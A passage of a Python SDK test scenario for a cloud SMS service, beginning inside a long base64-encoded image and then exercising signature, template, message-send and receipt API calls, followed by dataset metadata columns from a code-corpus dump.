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"
scenario.variables["phonenumber"] = ""
scenario.variables["templateid0"] = ""
scenario.variables["sigid0"] = ""
scenario.run(client)
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "CreateUSMSSignatureResponse"),
],
action="CreateUSMSSignature",
)
def create_usms_signature_00(client, variables):
d = {
"SigType": 0,
"SigPurpose": 0,
"SigContent": "test",
"File": variables.get("file"),
"Description": "test-sdk",
"CertificateType": 0,
}
try:
resp = client.usms().create_usms_signature(d)
except exc.RetCodeException as e:
resp = e.json()
variables["SigId"] = utest.value_at_path(resp, "SigId")
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "QueryUSMSSignatureResponse"),
],
action="QueryUSMSSignature",
)
def query_usms_signature_01(client, variables):
d = {"SigId": variables.get("SigId")}
try:
resp = client.usms().query_usms_signature(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "UpdateUSMSSignatureResponse"),
],
action="UpdateUSMSSignature",
)
def update_usms_signature_02(client, variables):
d = {
"SigType": 0,
"SigPurpose": 0,
"SigId": variables.get("SigId"),
"SigContent": "test-sig-update",
"File": variables.get("file"),
}
try:
resp = client.usms().update_usms_signature(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=False,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "DeleteUSMSSignatureResponse"),
],
action="DeleteUSMSSignature",
)
def delete_usms_signature_03(client, variables):
d = {"SigIds": [variables.get("SigId")]}
try:
resp = client.usms().delete_usms_signature(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=False,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "CreateUSMSTemplateResponse"),
],
action="CreateUSMSTemplate",
)
def create_usms_template_04(client, variables):
d = {
"Zone": variables.get("Zone"),
"TemplateName": "test-sdk-template",
"Template": "this is a sdk template",
"Region": variables.get("Region"),
"Purpose": 1,
}
try:
resp = client.usms().create_usms_template(d)
except exc.RetCodeException as e:
resp = e.json()
variables["TemplateId"] = utest.value_at_path(resp, "TemplateId")
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=False,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "QueryUSMSTemplateResponse"),
],
action="QueryUSMSTemplate",
)
def query_usms_template_05(client, variables):
d = {"TemplateId": variables.get("TemplateId")}
try:
resp = client.usms().query_usms_template(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=False,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "UpdateUSMSTemplateResponse"),
],
action="UpdateUSMSTemplate",
)
def update_usms_template_06(client, variables):
d = {
"Zone": variables.get("Zone"),
"TemplateId": variables.get("TemplateId"),
"Template": "test-sdk-template-update",
"Region": variables.get("Region"),
}
try:
resp = client.usms().update_usms_template(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=False,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "DeleteUSMSTemplateResponse"),
],
action="DeleteUSMSTemplate",
)
def delete_usms_template_07(client, variables):
d = {
"Zone": variables.get("Zone"),
"TemplateIds": [variables.get("TemplateId")],
"Region": variables.get("Region"),
}
try:
resp = client.usms().delete_usms_template(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=False,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "SendUSMSMessageResponse"),
],
action="SendUSMSMessage",
)
def send_usms_message_08(client, variables):
d = {
"Zone": variables.get("Zone"),
"TemplateId": variables.get("templateid0"),
"SigContent": variables.get("sigid0"),
"Region": variables.get("Region"),
"PhoneNumbers": [variables.get("phonenumber")],
"TemplateParams": ["101010"],
}
try:
resp = client.usms().send_usms_message(d)
except exc.RetCodeException as e:
resp = e.json()
variables["SessionNo"] = utest.value_at_path(resp, "SessionNo")
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=False,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "GetUSMSSendReceiptResponse"),
],
action="GetUSMSSendReceipt",
)
def get_usms_send_receipt_09(client, variables):
d = {
"Zone": variables.get("Zone"),
"SessionNoSet": [variables.get("SessionNo")],
"Region": variables.get("Region"),
}
try:
resp = client.usms().get_usms_send_receipt(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
| 1,852.260377
| 483,949
| 0.960442
| 12,221
| 490,849
| 38.565175
| 0.914737
| 0.00056
| 0.000318
| 0.000467
| 0.005056
| 0.004929
| 0.004687
| 0.004165
| 0.003904
| 0.003904
| 0
| 0.153559
| 0.003309
| 490,849
| 264
| 483,950
| 1,859.276515
| 0.809811
| 0.000151
| 0
| 0.60084
| 1
| 0.004202
| 0.988697
| 0.986662
| 0
| 1
| 0
| 0
| 0
| 1
| 0.046218
| false
| 0.004202
| 0.016807
| 0
| 0.105042
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4017c0d839e7cca845dc1f46eccfc6dbceab2ac8
| 33,656
|
py
|
Python
|
tools/decl_infile.py
|
zaimoni/Z.C-
|
7ca97ec0af14d092c87a25e07d7ed486c7912266
|
[
"BSL-1.0"
] | null | null | null |
tools/decl_infile.py
|
zaimoni/Z.C-
|
